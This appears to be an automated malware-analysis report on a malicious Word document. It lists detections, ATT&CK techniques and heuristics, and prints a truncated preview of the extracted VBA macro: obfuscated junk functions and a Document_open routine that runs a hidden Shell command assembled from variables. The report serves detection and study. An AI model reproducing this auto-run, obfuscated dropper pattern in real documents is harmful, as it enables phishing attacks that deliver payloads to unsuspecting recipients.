MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. A critical heuristic firing indicates the presence of a Shell() call within the VBA code, which is commonly used to download and execute additional malicious payloads. The ClamAV detection name 'Doc.Dropper.Agent-6615994-0' further supports its nature as a dropper. The document likely functions as a spearphishing attachment designed to deliver a secondary stage.
Heuristics 5
-
ClamAV: Doc.Dropper.Agent-6615994-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6615994-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 39374 bytes |
SHA-256: f65d9c60c0942d8efcaaf82648fdc2f71abf78b91c81c3b7c763d27e46a1fda1 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "mDWvoqoJDr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function ZatXNNWErQnOJ()
On Error Resume Next
vtRLdM = 83866 - njuGac - 59418 / kwnTdi / uPdklu * tmrEZS
hoGXT = 95674 - zbNzHd - 70087 / LVsXK / DKYdEU * OjjEU
ULEpQ = 21917 - RrVBL - 6398 / TInEGn / MGuOsl * UlJqn
XaLDi = 78010 - KEiNZS - 73459 / kzofb / rXAiB * LzqCdU
vhbBb = 98474 - CCMBT - 35782 / IAJCI / HEJaXa * zFLKY
End Function
Private Function sKvRdXtAljsd()
On Error Resume Next
ldqka = 65105 - OafFDP - 53385 / mNLoNp / VnQDvN * XNEzcP
rRBjSE = 50371 - ftainD - 42683 / ABpDoD / LzwRJ * kfjGaw
OMRqBD = 30202 - ivMPIX - 50553 / nKVvvK / NmpET * ZBckc
pzUdXG = 2528 - DsOcip - 79976 / HhvCK / bJhvo * dGXMq
IcaTR = 12649 - XGjCjz - 96977 / MiMIHC / hiJssJ * BNtJwV
bziHbl = 8057 - DDAsE - 20110 / ZKidXm / KwcSs * wUBmw
End Function
Private Function soozwUvicDjzb()
On Error Resume Next
bDQtB = 91594 - YZuEW - 88835 / OGiIb / qBlYY * jVlGm
TwRJD = 86518 - Mvziz - 78696 / dJROI / cRLslD * fbpNR
NnFiF = 73853 - XrlkB - 83854 / vzhDE / ZkVumT * NrQvXk
ljotcG = 62676 - alwoa - 91227 / BPulq / XDHBcE * jBkwm
EwpCiW = 17387 - JVHQri - 64455 / GCvOpP / Ejkkp * wdrVT
UwQEiM = 38697 - LzfUn - 26521 / UDpkB / fjszB * jZBBCd
End Function
Private Function NVKzYRLGi()
On Error Resume Next
PztOHL = 37599 - CRJSm - 49280 / ajfMAD / Xnhnk * XNqODl
RVtkj = 56717 - tGZXOL - 76549 / ajiGvA / SXMsv * IYBKYz
EqMztO = 4897 - IjJAw - 18792 / OJkZr / EZuajV * QAHIq
ttOKIT = 2188 - CTXmf - 40031 / SADnM / nuwSD * LEcKZm
TGMdw = 87488 - wJjYQp - 10425 / Hiqdu / jBmiYN * psjQH
iwurJ = 26924 - wwpjf - 54403 / wLCqw / FwPsEa * DaJzzO
End Function
Private Sub Document_open()
On Error Resume Next
iriwh = 4258 - tEmPi - 61625 / YsLQlb / DMYlzW * EtzXXL
DPLwj = 17310 - wnBLfT - 48343 / EDzLKi / czvsW * fPtSYc
RVMiLn = 14175 - PrAiot - 26649 / zvHafF / hfipL * sHUTub
dJKGQU = 47462 - YdpiHr - 94716 / kdqst / QjFDZL * NokEbu
AVKsVV = 66734 - RMrEOj - 9854 / AwbmRu / qjGIt * KrBLaD
nipWj = 84241 - NWHHzz - 17338 / Ezott / ANvMtL * FdjzHw
Shell "" + iwwQjshdfUTfQQ + iZAnNAomK + CVar("c") + ItHqiwIYzO + KvUQYDFPwwCtCu + GNCYvDalp + uicNpQGbFQL + AZGzXEwm + PkZDi + JDkKX + RGPqGGWAc + dCwvTtaTD + jzurokd + ibMUE + IsKtXFtlU + HBjWF + khMAQMimJ + wjfbIVTrn + YhjlwGSJ + SfaPArMjrsc + NjbjoN + YGSRdAC + YYtwLXKhFLU, 0
MpUHU = 81063 - ocaIzX - 41262 / zRJna / jUhNjd * swSKq
End Sub
Private Function RSTAwnDN()
On Error Resume Next
HauVCw = 55928 - uproO - 69551 / owFlD / OjRERw * OZZzHZ
jrbaIG = 8819 - HSErs - 23150 / uSYPd / BcvIDo * Lstir
okrvl = 1998 - zzdEzR - 48287 / EufGm / XrUfQt * uzEZfT
bapprk = 29775 - PzQAG - 63473 / wCUiJ / iZNui * aDDHXV
fQEjw = 98223 - GFUAua - 88943 / XGjRRs / PVHjE * ZiRznC
End Function
Private Function zVfLOlwzlwn()
On Error Resume Next
quEzuD = 9742 - lwXiYz - 93734 / WJncnP / zPmkz * pFssUP
mNOoXn = 53727 - jVQhza - 64170 / FBAvZ / laZWnM * wWkruh
ioCjli = 55888 - nunMr - 91341 / IwJNcr / wdbMu * WwQtcL
EmLkr = 39991 - cpEUhJ - 56274 / CMiSr / fnaJS * zPrFwz
QdEbQ = 14554 - brzWq - 35601 / mnZZwj / YEZnpw * dujfkT
End Function
Private Function PXTtmwwCs()
On Error Resume Next
lSljsG = 13337 - iWJLAE - 23299 / rKTTdX / RzSLh * AdSziL
lqvqzj = 51456 - WnKmC - 54348 / ziNrtn / mwZaG * LqhXw
HIBiw = 87749 - KWEZif - 4042 / IwJRFK / oXGobi * KXqhBj
NQzhS = 81596 - fAMsCd - 43369 / wfPQiL / cLJMB * AIBVM
FDsMR = 53112 - NOWOzn - 72517 / VUuZa / Mjwmc * zJzQB
YShhnc = 35586 - TrFKv - 81605 / QWANIT / ZuZAds * MVtUOS
NLIlY = 6213 - ovOwI - 25137 / XHiwoh / LizcL * tnnMa
ZiHImn = 5035 - HuAYf - 15690 / bbITqt / UwapLq * OGNMF
End Function
Private Function ivjhnYQdZzZmVk()
On Error Resume Next
TKpIEZ = 32230 - VqwnTi - 68162 / MKvKm
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.